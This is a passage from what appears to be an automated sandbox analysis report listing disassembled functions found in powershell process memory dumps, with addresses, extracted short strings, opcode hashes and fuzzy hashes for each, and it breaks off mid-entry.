                                            • Instruction ID: 14a2dc671afab39205c747898d30d7ce4c43f6af4fda76d475b37ea052616750
                                            • Opcode Fuzzy Hash: 0de28f53119bedf43cecf853411e1ec997dc51fca56fa753132262c6ab872200
                                            • Instruction Fuzzy Hash: 9D213962ADEB4F8FF395972C484517466C5EF42251B5984BDF04EC31E3EE1AEC498381
                                            Function 00007FFAAC48AFE4 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1397601725.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac480000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a4069144697109f53dc621280cbf7151462d988a6443562c2c3015e7e498691
                                            • Instruction ID: 2a6a9f09151bb72221d6f97c024c375cc5170b59527338e32234f2019913f9be
                                            • Opcode Fuzzy Hash: 7a4069144697109f53dc621280cbf7151462d988a6443562c2c3015e7e498691
                                            • Instruction Fuzzy Hash: FC310F3081964ECFFBB49F14CC4ABF932A4FF47319F404139D42D86192DA79AA49CB99
                                            Function 00007FFAAC483945 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1397601725.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffaac480000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction ID: 2656575291c8875a46413937028047aeba70f00380b257143915173ce57c4091
                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction Fuzzy Hash: 5101677111CB0C8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661D636E881CB45

                                            Executed Functions

                                            Function 07CF6D40 Relevance: 10.7, Strings: 8, Instructions: 658COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$x.xk$-xk
                                            • API String ID: 0-634362551
                                            • Opcode ID: 2750a42b88f09a902db26100b5741e1076d1a993695174c4f1a5d9efee2fe943
                                            • Instruction ID: adec2051ffeb3c77ee4cdfe1b83c2c507ce1df7898f4e209e156175bd530dbce
                                            • Opcode Fuzzy Hash: 2750a42b88f09a902db26100b5741e1076d1a993695174c4f1a5d9efee2fe943
                                            • Instruction Fuzzy Hash: BA427FB0A00215DFDB64DF54C990B9EBBB2BB85300F5485AAD909AF355CB31ED41CFA1
                                            Function 07CF6760 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$x.xk$-xk
                                            • API String ID: 0-634362551
                                            • Opcode ID: 8a635fede05468d9ac8ba85c548a1fccd0705abc663bbe1934d037771623485f
                                            • Instruction ID: da85be6a39b8d6387f72fe9b82a8e97dbc994bd557c8cd9d6c583d1f5b1918c0
                                            • Opcode Fuzzy Hash: 8a635fede05468d9ac8ba85c548a1fccd0705abc663bbe1934d037771623485f
                                            • Instruction Fuzzy Hash: CFD1B1B4A002059FD728DFA4C554B9EBBB2FF88710F25C469DA016F395CB31EC468BA1
                                            Function 07CF73BB Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$x.xk$x.xk$-xk
                                            • API String ID: 0-1322044245
                                            • Opcode ID: 9f060494091edbf660335c4053781a4c2c0fc27e97d5bbdcba17b9d15e0c2025
                                            • Instruction ID: dfbe5a42a87bb25a07b0c9da2e8c3f154a1b2497f7cfb79b32f44bdc5be6c867
                                            • Opcode Fuzzy Hash: 9f060494091edbf660335c4053781a4c2c0fc27e97d5bbdcba17b9d15e0c2025
                                            • Instruction Fuzzy Hash: 5EF191B4A002149FDB74DF64C950B9EBBB2BB84300F5484A9D6096F791CB71ED42DFA1
                                            Function 07CF674F Relevance: 6.5, Strings: 5, Instructions: 263COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$x.xk$-xk
                                            • API String ID: 0-1390172571
                                            • Opcode ID: 2ce520ccf8a138edd438cf08196edfbfd68108621942ede454a8c5aa15bea588
                                            • Instruction ID: 323ef3fd0abffbd9eee390b6e0eb2a15507863aa3d0ae652c1ccbc5caf83d4e4
                                            • Opcode Fuzzy Hash: 2ce520ccf8a138edd438cf08196edfbfd68108621942ede454a8c5aa15bea588
                                            • Instruction Fuzzy Hash: 4FB1ABB4A002049FDB24DF54C690B9EBBB2EF88714F15C469EA017F395CB31E9468BA5
                                            Function 07CF04E0 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q
                                            • API String ID: 0-3067366958
                                            • Opcode ID: f80c8f60a175062e7c40ce595b6c0ee900b1c6c6060dc8a33bb520c99066b931
                                            • Instruction ID: 6e2ad56ad05330285102260de201a0c26481e76ea674430633f5dc19c2ff124b
                                            • Opcode Fuzzy Hash: f80c8f60a175062e7c40ce595b6c0ee900b1c6c6060dc8a33bb520c99066b931
                                            • Instruction Fuzzy Hash: A1418DF1B006158FCF649A6999402AEF7E1AFC4A11B14842ADE09DB342DA31DA41C7E8
                                            Function 07CF3E48 Relevance: 3.2, Strings: 2, Instructions: 742COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: 6b791e6803487e4178dceabbf09065e161454c69466234c2d2600a1a48a697f7
                                            • Instruction ID: 98d3af9ad86d5122c449e8407024db54129a521927461f2031f774d48edc6f2f
                                            • Opcode Fuzzy Hash: 6b791e6803487e4178dceabbf09065e161454c69466234c2d2600a1a48a697f7
                                            • Instruction Fuzzy Hash: B4628BB4B00204DFDB68CB98C590B5EBBB2AF85314F15C469EA05AF351DB32ED42CB91
                                            Function 07CF04D6 Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q
                                            • API String ID: 0-3126353813
                                            • Opcode ID: 84790a911871fdaef9e276097c01faa964ff535184a9f89de238fa1d4a564b6c
                                            • Instruction ID: da2b237fdd6a8891dac73d34c542dda372fa423a483794c3f1041c0b024782b4
                                            • Opcode Fuzzy Hash: 84790a911871fdaef9e276097c01faa964ff535184a9f89de238fa1d4a564b6c
                                            • Instruction Fuzzy Hash: EA11DAF6E00A1ADB8F649F5995401B9B7F4FF48A10B194126DE18E7202D770DA80C7AD
                                            Function 07CF3E3E Relevance: 1.9, Strings: 1, Instructions: 651COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q
                                            • API String ID: 0-1807707664
                                            • Opcode ID: 72f1f91783566579261be4da1320e314c799aaeea162b288870c08a4bff3cf14
                                            • Instruction ID: 237bfd39b91a3df20a5777d1c34f55a93dfc5cecb0f78fbf2d50116cf4efac8f
                                            • Opcode Fuzzy Hash: 72f1f91783566579261be4da1320e314c799aaeea162b288870c08a4bff3cf14
                                            • Instruction Fuzzy Hash: 37527AB4A00245DFDB58CF44C590B9EBBB2BF85314F15C469EA05AB351CB72EE82CB91
                                            Function 07CF5B88 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: x.xk
                                            • API String ID: 0-2157606827
                                            • Opcode ID: 5e574562a0bd3f63e033916694c456f42b12ac0c7bdd6ef90192a4cde8f5cd6a
                                            • Instruction ID: 6e2121054ded7fd9ea7ec84ca84478c276f220f2c04f2c324c447bfb44c328dd
                                            • Opcode Fuzzy Hash: 5e574562a0bd3f63e033916694c456f42b12ac0c7bdd6ef90192a4cde8f5cd6a
                                            • Instruction Fuzzy Hash: 47B1A3B0B10204DFD768DB55DA54B9EBBE3AF89301F54C469DA02AF781CB31EC418BA5
                                            Function 07CF5B68 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: x.xk
                                            • API String ID: 0-2157606827
                                            • Opcode ID: 36f02435c2d682fd2c5d711627f13e3626a7c08be459b6599f534a9c3bef0bb3
                                            • Instruction ID: e2e13eb3e2d75620d3f484bc9b8719a6b00416335cdc01313f4aa9cf26e1f0e4
                                            • Opcode Fuzzy Hash: 36f02435c2d682fd2c5d711627f13e3626a7c08be459b6599f534a9c3bef0bb3
                                            • Instruction Fuzzy Hash: C3A1AFB0A00200AFD768DF54DA94B9EBBF2AF89310F54C469E6016F791CB31EC41CBA1
                                            Function 07CF1493 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: h2zk
                                            • API String ID: 0-4152957090
                                            • Opcode ID: 7c2c56ccf3f0b6a1f602a21a826a564ca4d2f2fd0f7c28e30f334234258a9eb9
                                            • Instruction ID: b64ae7d341d2665bf9a591cee46c1cd34b8127a6a765d5442846999589ef7bc1
                                            • Opcode Fuzzy Hash: 7c2c56ccf3f0b6a1f602a21a826a564ca4d2f2fd0f7c28e30f334234258a9eb9
                                            • Instruction Fuzzy Hash: E651A2F5B10209DFEB64CE58D550B69BBA2EF85314F18C469EA059F381CB32DD41CB51
                                            Function 07CF6B86 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: x.xk
                                            • API String ID: 0-2157606827
                                            • Opcode ID: 28bd3d226455ebdcd2c356f1fb656e48be6b99feafef7a8071cc2b28abd3f8c1
                                            • Instruction ID: 4239921645d40c30d8b11ee7b3c17f863ee0c9ccb2e4c7f47056170072f85172
                                            • Opcode Fuzzy Hash: 28bd3d226455ebdcd2c356f1fb656e48be6b99feafef7a8071cc2b28abd3f8c1
                                            • Instruction Fuzzy Hash: 273166B4B00214AFE7249B64C954FAE7BA3ABC4710F15C428E9016F781CF759C428BE5
                                            Function 07CF100F Relevance: .4, Instructions: 371COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b45a7a0f9b2220ceb5bb0a567d956b877a1db21ae07978ad57b34695c6500494
                                            • Instruction ID: 725dc50da24a439f7b672523e5e543e8960a0f121b3bb87e20d622419f8b38b4
                                            • Opcode Fuzzy Hash: b45a7a0f9b2220ceb5bb0a567d956b877a1db21ae07978ad57b34695c6500494
                                            • Instruction Fuzzy Hash: C4E15BB4A00209DFDB64CF98D580AA9BBF2FB89314F18C069EA199B751C732ED41CF51
                                            Function 07CF463F Relevance: .2, Instructions: 184COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc1890c2eed504247cf81441ef181d7574be912d3d9659160b938f9535340ace
                                            • Instruction ID: 6f6a637ec315b03163bd5c1762f8adeda84a0c6aac922521af20d7d60537fe4b
                                            • Opcode Fuzzy Hash: cc1890c2eed504247cf81441ef181d7574be912d3d9659160b938f9535340ace
                                            • Instruction Fuzzy Hash: 3A719CB4A00241DFD768CF84C591F6ABBA2BF85314F15C469EA059F791CB32EE42CB91
                                            Function 07CF9E70 Relevance: .2, Instructions: 181COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b68ba5e0e2ef680ac89cbcb163c5c19cd8afccf069371c5867f693b6e21bc179
                                            • Instruction ID: aec24718f35d4b58f266cd038648267a464ebfa205887bd65ec123bccaaea170
                                            • Opcode Fuzzy Hash: b68ba5e0e2ef680ac89cbcb163c5c19cd8afccf069371c5867f693b6e21bc179
                                            • Instruction Fuzzy Hash: 92513BB0B043018FDB759B749951B6EBBA29FC6310B14C4BADA05CB391DB32ED05CBA1
                                            Function 07CF9E5F Relevance: .1, Instructions: 118COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82e936865fc7ba75eb1dbc275d849c9bf9379d61c557ef8e164df5a4e43ccbcd
                                            • Instruction ID: 8e2ca810b826f51ccd87b15967f95f9e52251a83a269063a784b255d73822292
                                            • Opcode Fuzzy Hash: 82e936865fc7ba75eb1dbc275d849c9bf9379d61c557ef8e164df5a4e43ccbcd
                                            • Instruction Fuzzy Hash: 9541E9F0B04302DFCF758E259580B6EBBA2ABC6354F1484A9DA05DB351D732ED45CBA1
                                            Function 07CF0A58 Relevance: .1, Instructions: 104COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f42dec8bca560dbbaded7c2ade2e531ade9539755a89e5111f1637618e825927
                                            • Instruction ID: 35abbdf41586b405efb7080e49b14d76eec9239369f1dd520ec226e2de5c60e4
                                            • Opcode Fuzzy Hash: f42dec8bca560dbbaded7c2ade2e531ade9539755a89e5111f1637618e825927
                                            • Instruction Fuzzy Hash: 853197B13053525FCB65466558117B6BBA69FC2610F28846BEA44CB2C3DA76CAC1C371
                                            Function 07CF0A78 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cbcc8cf9754fa791f1553892cfc3879e2bdb33eda0220fed0d0240e2aee3361e
                                            • Instruction ID: 72dfd71aa96963cc678b6fe5a0764ae692b5c781058a0afaf63427ed5211140f
                                            • Opcode Fuzzy Hash: cbcc8cf9754fa791f1553892cfc3879e2bdb33eda0220fed0d0240e2aee3361e
                                            • Instruction Fuzzy Hash: 342179F13003179BDB7856BA5851737B796ABC4B15F24883EAA09CB3C2DD76C9818360
                                            Function 07CF0668 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a5d986bf3fcd46d4f18aa1a33f198daedac5017801ee3b73c4892db1c692aa0
                                            • Instruction ID: 9987691e8766f5a9b52ba5389b0a5b69be47a13f1ebc70b83a27eab0a0f28cd0
                                            • Opcode Fuzzy Hash: 0a5d986bf3fcd46d4f18aa1a33f198daedac5017801ee3b73c4892db1c692aa0
                                            • Instruction Fuzzy Hash: A901F7B63003168FD7A455AAE40067AB7959FC5A22F54C43BEE49C7242D672C985C7A0

                                            Non-executed Functions

                                            Function 07CFBB80 Relevance: 17.9, Strings: 14, Instructions: 435COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q
                                            • API String ID: 0-1185439275
                                            • Opcode ID: 6322d44f3df209d1f69ba28bd211cfa4b76d495153a4cb23eb99f8feb03d3112
                                            • Instruction ID: 1a693a5d57f922de43dd60d9fe907b83620cea27406c718aec3fcb019ca95d92
                                            • Opcode Fuzzy Hash: 6322d44f3df209d1f69ba28bd211cfa4b76d495153a4cb23eb99f8feb03d3112
                                            • Instruction Fuzzy Hash: A2E107F5B0020ADFDB64CF69D4847AAB7A2FF85311F14C466EA158B244DB31DE42CBA1
                                            Function 07CF8050 Relevance: 15.5, Strings: 12, Instructions: 470COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q
                                            • API String ID: 0-2731293024
                                            • Opcode ID: 6e22f5a8b0220905978665a1235857d0f351814934adc9f0e01e9aa244b0072c
                                            • Instruction ID: ae323163807390b352c3a3d30165f9d46ca49cae6bea205059ea19a5c3b410fe
                                            • Opcode Fuzzy Hash: 6e22f5a8b0220905978665a1235857d0f351814934adc9f0e01e9aa244b0072c
                                            • Instruction Fuzzy Hash: 53F15CB1B00206DFDB64DB65D9517AEBBE2AFC5310F24C469DA058B351DB31DE01CBA1
                                            Function 07CF9208 Relevance: 14.1, Strings: 11, Instructions: 352COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$}l$}l
                                            • API String ID: 0-3198424303
                                            • Opcode ID: e9c6146ebff20103e4ce74fd5520cd9328a714905b49f68cf716c284b8174ceb
                                            • Instruction ID: b46003ae31b1f04efc6e8777f333721d78d037d7eee46a5eb4d88b4b23c7ad92
                                            • Opcode Fuzzy Hash: e9c6146ebff20103e4ce74fd5520cd9328a714905b49f68cf716c284b8174ceb
                                            • Instruction Fuzzy Hash: 42B16CB17042068FCF759B7998007AABFB1AFC6211F19846BDA05CB351DB31E945C7A1
                                            Function 07CFD17D Relevance: 14.0, Strings: 11, Instructions: 285COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$tPq$tPq$tPq$tPq$$q$(q$(q$(q$(q
                                            • API String ID: 0-1570892024
                                            • Opcode ID: f3d6818b29677ee98109de99e77fedb44bc1a1b1d26409be08acd55d34e67112
                                            • Instruction ID: dc96031c145cefb8d5f5cbc3ab582960a5bdbd408d4ad73e903c27e760484c82
                                            • Opcode Fuzzy Hash: f3d6818b29677ee98109de99e77fedb44bc1a1b1d26409be08acd55d34e67112
                                            • Instruction Fuzzy Hash: 34A107B0B002069FDB659F65C95576EBBB2BF89311F18C4A9EA06AF280CA31DD41C791
                                            Function 07CFC905 Relevance: 11.5, Strings: 9, Instructions: 209COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$d%q$d%q$d%q$d%q$tPq$tPq$$q
                                            • API String ID: 0-328666906
                                            • Opcode ID: cac497ccfdbf74664b8ae8074196c650b51de5a1bb9e08ebbcb339bf8320a44d
                                            • Instruction ID: 7221465f99648b2713be58f1e1c8c712393023f9e2f0f1ca930afa74ec319008
                                            • Opcode Fuzzy Hash: cac497ccfdbf74664b8ae8074196c650b51de5a1bb9e08ebbcb339bf8320a44d
                                            • Instruction Fuzzy Hash: 8B7139B5B0020E9FDB74CB65D48176ABBA2BF85700F188869DE019B381EB31DE41C7B1
                                            Function 07CF2C38 Relevance: 9.0, Strings: 7, Instructions: 286COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q
                                            • API String ID: 0-1721289453
                                            • Opcode ID: 26075ddd5826ee72617dbf4b5ebadf015f20c2b1bedd56003f07ddf48348dd17
                                            • Instruction ID: 74e6e1229826c9ea467d7f9ebae21d3c72424d12fe8160d8b6f4495e64abdaff
                                            • Opcode Fuzzy Hash: 26075ddd5826ee72617dbf4b5ebadf015f20c2b1bedd56003f07ddf48348dd17
                                            • Instruction Fuzzy Hash: 429169B1B043069FDB648F69D4417AEBBE2FFC5211F2880ABD945CB251DB35CA01C7A1
                                            Function 07CFA688 Relevance: 7.8, Strings: 6, Instructions: 265COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Twk$4'q$4'q$4'q$4'q$DUwk
                                            • API String ID: 0-1529901494
                                            • Opcode ID: c67e00d988784fe7a7055af0cd53e37972c324aee2f316d00bdeed148ef63bee
                                            • Instruction ID: dfb6242168fe083db001f62d783603a5daedd407eacd35b299787aa0da08e864
                                            • Opcode Fuzzy Hash: c67e00d988784fe7a7055af0cd53e37972c324aee2f316d00bdeed148ef63bee
                                            • Instruction Fuzzy Hash: F38118B1B002068FCB64DB69D54566EF7F2AFC6210F15C47ADA0DCB251EB31DA42CBA1
                                            Function 07CF86D8 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q$$q$$q$$q
                                            • API String ID: 0-2069967915
                                            • Opcode ID: b04e328ad3703d80e12747ca0fea283d1b1a8456fe3ca992f5f835f540db904d
                                            • Instruction ID: 2de0adba09366460bf512d7b58568a7b109838b0346fedf0386e5f7e25864768
                                            • Opcode Fuzzy Hash: b04e328ad3703d80e12747ca0fea283d1b1a8456fe3ca992f5f835f540db904d
                                            • Instruction Fuzzy Hash: 70316EB6B043038FDB754666A890376B7E1AFC2211B28847FEA428B241DF35C585C761
                                            Function 07CF2535 Relevance: 7.6, Strings: 6, Instructions: 62COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q$$q$$q
                                            • API String ID: 0-1538229613
                                            • Opcode ID: d00b7fcc111d9141b59dc9b16218e8506314612f8a7d6b85909f36e4220d1d60
                                            • Instruction ID: 08b34f961451eb02365810927da7995688f977a1d3ee29d1aec059f3439bc1ba
                                            • Opcode Fuzzy Hash: d00b7fcc111d9141b59dc9b16218e8506314612f8a7d6b85909f36e4220d1d60
                                            • Instruction Fuzzy Hash: BE115EB0B0460ADFCB788B5A94B056E7BE1FF4575072A40AADD458F302CA30DC01C7D0
                                            Function 07CFD7FF Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
